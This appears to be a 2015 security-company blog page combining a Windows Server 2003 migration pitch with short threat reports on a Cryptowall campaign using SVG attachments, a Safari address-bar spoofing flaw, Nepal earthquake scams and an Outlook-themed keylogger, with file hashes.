End of life (EOL) is approaching. July 14, 2015 is an important date to note if your organization is still running Microsoft Windows Server 2003. After this date, extended support will end and Microsoft will no longer deliver critical security patches or updates. Being slated by some as one of the “biggest security risks of 2015,” there are major threats to your organization if migration is forgone or delayed past this deadline. This official alert from the US Department of Homeland Security warns of the possible consequences facing those who do not take action, including cybersecurity threats, as well as compliance and compatibility issues.

Plan ahead! Doing a migration after a server has failed will not only increase server maintenance costs, but will also put your data at risk and result in lost productivity. By moving to the cloud, you can reduce your costs and grow your business. AppRiver has solutions for you in both our Secure Hosted Exchange and Office 365 services. There are a few initial steps that our team can help you complete and depending on which platform you’re coming from, we can easily migrate your email messages, folders, calendars, contacts and notes. We understand that migrating your email and services can be a stressful transition, but our 24/7 Phenomenal Care™ team will be with you every step of the way, eliminating the guess work and helping you transition with confidence.

This morning we had a malware campaign with zipped svg files attached in the messages. SVG files are normally used for images and supports some interactive features. An example would be maybe something like a graph on a webpage that showed some info when hovering over an option. These SVG files however contained a small javascript entry that would open a webpage to download some malware.

Screenshot from 2015-05-20 10:44:31Screenshot from 2015-05-20 09:45:21

The IP link in question ends up forwarding to another domain where a zip is downloaded of the actual exe payload. It didn’t auto execute, user interaction would still be needed for that. The payload this time around is Cryptowall. When the file executes it creates HELP_DECRYPT.TXT, HELP_DECRYPT.PNG, HELP_DECRYPT.HTML, and HELP_DECRYPT.URL files that have all been associated with Cryptowall infections. Searching any of those file names online brings many write ups on the virus family. It also created a public RSA key and entered it in to the registry (the key used with encrypting the files). After giving it just a few minutes, indeed the popup about Cryptowall 3.0 popped up with steps to pay. Crypto ransomware has proven many times it is effective for attackers in getting users to actually pay the ransom. The tactic is still alive and likely to continue evolving. With the attacks still being prevalent, it’s a good idea to make sure you are covered with data backups that cannot be potentially accessed by the malware (it’s been known to encrypt network shares and NAS units).

HELP_DECRYPT.2 (copy)

The original notification pop up on the PC

Screenshot from 2015-05-21 13:56:36 (copy)

The website on Tor showing how to pay the $700 to decrypt files.

 

 

And the interesting bit of info I noticed while looking at the exe that was downloaded, was that it had sql commands hard coded in it. Looking closer they all seemed related to a potential schools sql database. Some of the recipients we stopped this malware for were schools but nothing seemed out of the ordinary with the volume of recipients, which was low volume in general. While it’s possible the malware had other intentions from encrypting in mind, like to wreak havoc in a sql database, this was from a strings output so it was all plain text and the table naming conventions just seem a little too plain as well. However, someone knowing sql table names or a school using a plain naming convention could be problematic if the malware were to attempt to attain access and do its thing. It’s certainly also a tactic for malware authors to add in code that isn’t used or code that fluffs up functions to distract from analysis and make analyzing more complex and time consuming. So that’s a possibility. While these appeared to be part of valid functions, it looks like they were not used during testing. Though it’s possible there were very specific parameters that needed to be met for this to go active and attempt sql changes.

Screenshot from 2015-05-20 10:09:43

Also, there was some ASCII art in the strings output. I had originally posted this upside down but after flipping it, it appears to be an animal holding a heart.

Screenshot from 2015-05-20 15:24:04

 

 

Safari

Researcher David Leo of Deusen.co.uk has announced a proof of concept vulnerability that was active , until recently, in both Chrome and Safari browsers that allows attackers to spoof legitimate URLs in their address bar while taking web surfers to a completely different site. Chrome has since patched this vulnerability, but Safari has not. This leaves all devices that rely on the Safari browser vulnerable to this exploit. This includes current Macs running OSX, iPhones and iPads.

This exploit works by running a quick and tiny code snippet in the browser when a supposed legitimate link is provided to end users. The actual “legitimate link” is requested and the browser begins to head in that direction, however before it can, the exploit redirects the browser to the false destination. The original URL destination remains in the address bar, making it appear as though the user has ended up at the legitimate site. The code is very simple and very light weight making it possibly very enticing to those who would like to offer up a very convincing phishing attack. Through spoofing, attackers already utilize legitimate sites and news stories to make their attacks more convincing, usually by stealing graphics and headlines. A couple of safety precautions, or things to look out for in these attacks, would be to mouseover the link provided to make sure it was pointing where it says it is pointed. Otherwise ending up at a destination that was not advertised is another bright red flag. However in this style of attack, everything would simply appear normal and correct on the surface.

This is a look at the code that executes this exploit:

safair

This particular PoC attack makes the user believe they are headed to the news site dailymail.co.uk, however the hidden redirect takes viewers back to the research page on deusen.co,uk while maintaining dailymail.co.uk in the address bar.

To test this exploit out on your system, David Leo has provided a test page to see if you are a potential victim located here:  http://www.deusen.co.uk/items/iwhere.9500182225526788/ SImply gress “Go” and if Dailymail shows in your address bar, you are still vulnerable to this attack and are encouraged to be extra careful while browsing the internet or following links within emails from unexpected sources.

safair2

As most people know by now, a large earthquake struck Nepal a few days ago causing massive amounts of damage and deaths in the thousands. After most large tragic events like this, unfortunately scammers come out of the dark corners of the internet to take advantage of the publics kindness in wanting to assist in situations like this. We’ve seen it many times and unfortunately with the Nepal earthquake, it’s no different.

We’ve been seeing a slow influx of messages mentioning the earthquake as an attention getter for normal spam. Things like diabetes medicine spam will have a quick news sentence at the top about the earthquake to get a users attention and then go on to try and sell whatever the original goal was. We’ve also seen customized 419 scam messages coming in claiming to be victims of the earthquake. The theme is similar to normal 419’s where they want you to help them with their large amounts of money, but specifically focused around recent events with the earthquake.

Screenshot from 2015-04-29 08:53:32

There have been some emails claiming to be part of relief funds that are just phishing for responses as well. Responding to messages like this opens up a can of worms allowing the attacker to focus on the user and try to convince them to send money somewhere. In a case like a large disaster, they may focus on using guilt to force a user in to sending money which can be a very effective method.

Screenshot from 2015-04-29 08:48:51

There was a small virus campaign that happened as well. It looks like the exe was having some issues though since it seemed to keep crashing shortly after starting. However I did see some keyboard hooking so it was most likely a small keylogger that would record keystrokes and send them off to a remote server.

Screenshot from 2015-04-29 08:56:27

 

 

It’s always unfortunate to see spammers and virus campaigns focus on taking advantage of peoples good will in wanting to help. We always see these types of things after world news worthy events and we will probably continue to see it. This doesn’t mean users should ignore any emails asking for support or help since there will be legitimate companies and organizations seeking support. But users should be mindful of emails pertaining to recent events since that can be a major focus in campaigns over the coming weeks. Researching charities or dealing with known companies on their public websites and avoiding unknown or unexpected attachments are good steps to make sure you aren’t getting scammed or running viruses.

 

wormhole_1Yesterday we began seeing a malware campaign posing as a message from “Microsoft Outlook”. The messages pose as a notification to the user that they have exceeded their mailbox storage limit. They advise the user to open the attachment to upgrade their account. The attachment in these messages is an ACE (.ace) archive that contains a malicious SCR (.scr) file. ACE is a data compression file format similar to the more commonly used ZIP or RAR files and though it is not as commonly used as ZIP or RAR, unpacking ACE files is supported my many third party archivers so it should not pose a problem for most users. The file inside is a rather large (643kb) SCR file named updatemail(dot)ace.

outlookvirus

While the majority of malware hitting our filters each day contain an smaller Trojan ‘dropper’ file that pulls down additional malicious software from the internet, this particular piece contains all needed functionality in the original attached file. In other words, it has no need to pull down more malicious software from the internet to do its damage. Once executed the malware drops a file in AppData then adds to run regkey to ensure that it remains running on the system at all times in the future. It also immediately registers a hook to monitor keyboard input (keylogging) as well as setting up a listener on TCP port 49202. We also observed the malware attempting to harvest bitcoin that might be stored on the user system. We also observed a self-propagation functionality via smtp so we can likely expect to see more of these in the future.

File Name Updatemail(dot)ace
MD5 7e46f98e98eb39d13ddfaa66551181b7
SHA1 6baeced8fdf6c93a024167fb961e5037b59e5006
SHA256 eb97f6d0a454e0034e06d16e69ab6dddbf9d3d8e790e66003d6b3cfebd9d29e7